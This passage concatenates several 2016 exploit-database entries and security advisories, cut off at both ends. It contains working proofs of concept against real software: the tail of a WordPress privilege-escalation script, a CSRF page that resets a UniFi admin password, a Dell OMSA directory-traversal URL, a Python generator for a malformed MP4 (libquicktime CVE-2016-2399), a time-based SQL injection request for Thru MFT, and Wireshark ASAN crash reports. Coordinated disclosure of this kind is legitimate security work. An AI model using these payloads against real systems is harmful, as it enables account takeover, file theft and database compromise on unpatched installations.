soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
print('Error')
exit(1)
data = {
'eudwp_capabilities[administrator]': 1,
}
for i in f.find_all('input'):
if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
data[i.attrs['name']] = i.attrs['value']
r = s.post(profileUrl, data)
if r.status_code == 200:
print('Success')
exit(0)
"""
Solution
--------
Upgrade to v0.4.2.1
Timeline
--------
1. **2016-02-13**: Vendor notified through wordpress.org support forums
2. **2016-02-13**: Vendor notified through through the contact form in
his website
3. **2016-02-13**: Vendor responded and received details about this issue
4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
"""
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
-----------------------
Product: Ubiquiti Networks UniFi
Vendor URL: www.ubnt.com
Type: Cross-Site Request Forgery [CWE-353]
Date found: 2015-03-19
Date published: 2016-02-23
CVSSv3 Score: 6.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
--------------------
UniFi v3.2.10
older versions may be affected too.
4. INTRODUCTION
---------------
The UniFi® Controller software is a powerful, enterprise wireless software
engine ideal for high-density client deployments requiring low latency and
high uptime performance. A single UniFi Controller running in the cloud
can manage multiple sites: multiple, distributed deployments and
multi-tenancy for managed service providers.
(from the vendor's homepage)
5. VULNERABILITY DESCRIPTION
----------------------------
A generic Cross-Site Request Forgery protection bypass vulnerability was
identified in UniFi v3.2.10 and prior.
The application uses a CSRF protection, which is based on verifying the
Referer header, but does not catch the case where the Referer header
is completely missing.
This leads to a generic CSRF protection bypass, resulting in all
application specific functionalities becoming vulnerable. An attacker needs
to trick the victim to visit an arbitrary website in order to exploit the
vulnerability. Successful exploits can allow the attacker to compromise the
whole application including connected devices, e.g. by changing passwords
of users, adding new users, changing device usernames and passwords or by
creating new WLAN configurations.
6. PROOF-OF-CONCEPT
-------------------
The following PoC changes the password of the user "admin" to "csrfpwd":
<html>
<head>
<script>
function load() {
var postdata = '<form id=csrf method=POST enctype=\'text\/plain\' action=\'https://127.0.0.1:8443/api/s/default/cmd/sitemgr\'>' +
'<input type=hidden name=\'json=%7B%22name%22%3A%22admin%22%2C%22x_password%22%3A%22csrfpwd%22%2C%22email%22%3A%22info%40mail.com%22%2C%22lang%22%3A%22en_US%22%2C%22cmd%22%3A%22set-self%22%7D\' value=\'\' />' +
'</form>';
top.frames[0].document.body.innerHTML=postdata;
top.frames[0].document.getElementById('csrf').submit();
}
</script>
</head>
<body onload="load()">
<iframe src="about:blank" id="noreferer">< /iframe>
</body>
</html>
7. SOLUTION
-----------
Upgrade to UniFi v4.7.5 or later
8. REPORT TIMELINE
------------------
2015-03-19: Discovery of the vulnerability
2015-03-10: Reported via Ubiquiti's Bug Bounty program (hackerone.com)
2015-06-02: Vendor apologizes his backlog
2015-09-28: Asking for status update via HackerOne
2015-09-28: Vendor asks to test against version 4.7.5
2015-10-02: Verified working fix for v4.7.5
2015-10-23: Vendor changes status to "Resolved"
2015-11-24: Asking for coordinated disclosure via email
2015-12-08: No response from vendor
2015-12-08: Requested public disclosure on HackerOne
2016-01-08: Report is published automatically
2016-02-23: Advisory released
9. REFERENCES
-------------
https://www.rcesecurity.com/2016/02/ubiquiti-bug-bounty-unifi-v3-2-10-generic-csrf-protection-bypass
https://hackerone.com/reports/52635
# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated
Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link:
http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64
When authenticated as an admin, make the following adjustments to the URL
below:
1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.
https://
<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF
In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.
The path parameter should not be changed; the provided value is essential
to bypassing a security control.
#!/usr/bin/env python
#
###
# - 7 February 2016 -
# My last bug hunting session (*for fun and no-profit*)
# has been dedicated to libquicktime
###
#
# Author: Marco Romano - @nemux_ http://www.nemux.org
# libquicktime 1.2.4 Integer Overflow
#
# Product Page: http://libquicktime.sourceforge.net/
# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
# Affected products: All products using libquicktime version <= 1.2.4
#
# CVE-ID: CVE-2016-2399
#
# Disclosure part: http://www.nemux.org
#
########
####### Timeline
#
# 07 Feb 2016 Bug discovered
# 17 Feb 2016 Mitre.org contacted
# 17 Feb 2016 Disclosed to the project's maintainer
# 23 Feb 2016 No response from the maintainer
# 23 Feb 2016 Publicly disclosed
#
########
####### References
#
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
# http://libquicktime.sourceforge.net/
# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html
# https://en.wikipedia.org/wiki/QuickTime\_File\_Format
#
#######
#
# DISCLAIMER: It's just a PoC... it will crash something
#
####
import sys
import struct
import binascii
"""
There needs to be an mp4 file with these nested atoms to trigger the bug:
moov -> trak -> mdia -> hdlr
"""
hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1"
"6D6F6F76" #### moov atom
"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000"
"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000"
"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000"
"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF"
"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
"7472616B" #### trak atom
"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
"6D646961" #### mdia atom
"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
"4E" #### hdlr atom length
"68646C72" #### hdlr atom
"0000000000"
"4141414141414141" #### our airstrip :)
"0000000000000000000000"
"EC" #### 236 > 127 <-- overflow here and a change in signedness too
"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))
def createPoC():
try:
with open("./nemux.mp4","wb") as output:
output.write(hax0r_mp4)
print "[*] The PoC is done!"
except Exception,e:
print str(e)
print "[*] mmmm!"
def usage():
print "\nUsage? Run it -> " + sys.argv[0]
print "this poc creates an mp4 file named nemux.mp4"
print "--------------------------------------------"
print "This dummy help? " + sys.argv[0] + " help\n"
sys.exit()
if __name__ == "__main__":
try:
if len(sys.argv) == 2:
usage()
else:
print "\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n"
print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n";
createPoC();
except Exception,e:
print str(e)
print "Ok... Something went wrong..."
sys.exit()
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2015-056
Product: Thru Managed File Transfer Portal
Manufacturer: Thru
Affected Version(s): 9.0.2
Tested Version(s): 9.0.2
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2015-10-28
Solution Date: 2016-01-22
Public Disclosure: 2016-02-15
CVE Reference: Not yet assigned
Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
(SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Thru Managed File Transfer Portal is a web based file transfer application.
According to the Thru website [1], the application aims to offload large
file transfer to a single platform, to protect files, to replace FTP
servers and to allow access to files anytime, anywhere.
An SQL injection vulnerability was identified in one of the GET request.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in a GET request that causes
contact data to be sorted. At least the attribute values of sortorder
and letterrange are not correctly sanitized and therefore can be abused
to inject arbitrary SQL statements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to show that the SQL statement
causing a delay is executed and results in a 500 server error:
GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
Host: [HOST]
Cookie: [COOKIES]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The reported security vulnerability has been fixed in a new software
release. Update to the new software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-10-27: Vulnerability discovered
2015-10-28: Vulnerability reported to manufacturer
2016-01-22: Manufacturer announced update
2016-02-15: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Thru Homepage
http://www.thruinc.com
[2] SySS Security Advisory SYSS-2015-056
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Dr. Erlijn van Genuchten and
Danny Österreicher of the SySS GmbH.
E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
E-Mail: danny.oesterreicher@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
Key ID: 0x96029AC7
Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCgAGBQJWwbbpAAoJEAylhje9lv8qAh4P/1yg6xg5xHvvnh2Al1fy/ley
rABwBv9YmcNhNLASrxPOXGBx6rcuCc5zEdOI62PKv4E19VMcjOvwHw5MzfP/4GDu
LAAku71zIn6YCxYF1NKScyqDeBg6OZfHiW6EP/ufhFD+pzu0FySmj2G3/lflloEX
FBNHzNURGakWizxzaNbnnltI3DuxPss3E67crJMHEPtXUw0dVrQAeMtsyc46708z
pWh1JAvNNIlqyyQwyy3EOvQtOIkYd8SMmayla2CUpl0xC5On5GcxkqvaZcqyScR9
s4rxVS8x7akGDGS/F2aFM2zEfCL5DAXVCoRWTyKYqcMYINdZY3xuREcG3iOXVMrp
yRYBg6dgwf3QHRmCrkZLlKx6hibHG13dRykD7LPcO3H+q81Ll4T/6OuHqbHbPjD2
EeOqW+bKDn//TKrsUbwvaM/1hF96T66QLRvUeTGHbMoNjN3fQTTqdBaYHq8ROiD8
Xc1ybVxgxUMKi+3WEvOw5aYF6Q/RN9Z4WN2p88+MLrBRFCh6nHT0jPKZFyxZuooi
b3MI/qPawWO4HfpjvunCdNGo49I34JCcAsi2Um8qzM/aedbUaH1dqj6sZW4j8bA2
WzwXgwnLXQ+wON/tCDz8Q4NfZWbDG2v1anJBOTIgABjLAeuo0nDaBYonyp4lY/Og
4UaL7kboaGGj3mRINLd8
=df2e
-----END PGP SIGNATURE-----
Source: https://code.google.com/p/google-security-research/issues/detail?id=648
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
READ of size 8 at 0x000005676c18 thread T0
#0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
#1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
#2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
#4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
#6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
#8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
#9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
#10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
#11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
#12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
#13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
#15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
#16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
#18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
#25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
#29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
#30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
#31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
#32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
#38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
#45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
#46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
#47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
#48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
#49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#84 0x53c91b in process_packet wireshark/tshark.c:3728:5
#85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#86 0x52c1df in main wireshark/tshark.c:2197:13
0x000005676c18 is located 8 bytes to the left of global variable '<string literal>' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
'<string literal>' is ascii string 'queryWithPerm '
0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
Shadow bytes around the buggy address:
0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7855==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39484.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=654
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198
READ of size 4 at 0x7fd688698b10 thread T0
#0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8
#1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16
#2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12
#3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14
#4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17
#5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7
#6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
#7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3
#16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x5264eb in process_packet wireshark/tshark.c:3728:5
#18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#19 0x515daf in main wireshark/tshark.c:2197:13
0x7fd688698b10 is located 48 bytes to the left of global variable '<string literal>' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30
'<string literal>' is ascii string 'Average Signal to Noise Ratio'
0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report
Shadow bytes around the buggy address:
0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9
0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9
0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9
0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01
0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9
0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00
0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32475==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39483.zip
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
BlackBerry Enterprise Service 12 (BES12) Self-Service
Affected versions: BES12 < 12.4
CVE: CVE-2016-1914 and CVE-2016-1915
PDF:
http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+-----------+
|Description|
+-----------+
Blackberry BES12 is an enterprise mobile management solution and
contains a self-service web application available to mobile users. This
web application contains multiple vulnerabilities including
unauthenticated SQL
injection and reflected cross site scripting.
Limited access to an on-premise BES12 environment was provided during
the discovery of these vulnerabilities. The full impact of the
vulnerabilities in relation to compromising other portions of the BES12
solution, such as mobile devices, is unclear.
+------------+
|Exploitation|
+------------+
*SQL Injection*
The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
injection via the imageName parameter. This servlet is exposed at
multiple paths and is used to fetch an image from the database:
/mydevice/client/image
/admin/client/image
/myapps/client/image
/ssam/client/image
/all/client/image
This was discovered on a production BES12 on-premise deployment and the
injection vector allowed both UNION and stacked queries to be executed
on the Microsoft SQL server used by BES12. This allows full read/write
access to the database, and can potentially result in command execution
via xp_cmdshell depending on the database user configuration.
The following proof of concept demonstrates an injection payload which
will select the entire obj_keystore_entry table. The query will
